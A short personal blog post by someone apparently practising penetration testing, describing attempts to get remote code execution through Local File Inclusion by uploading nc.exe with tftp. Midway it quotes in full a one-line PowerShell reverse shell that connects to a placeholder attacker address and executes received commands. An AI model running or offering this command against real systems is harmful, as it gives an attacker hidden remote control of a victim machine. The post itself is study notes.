RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sláinte!

Leave a Reply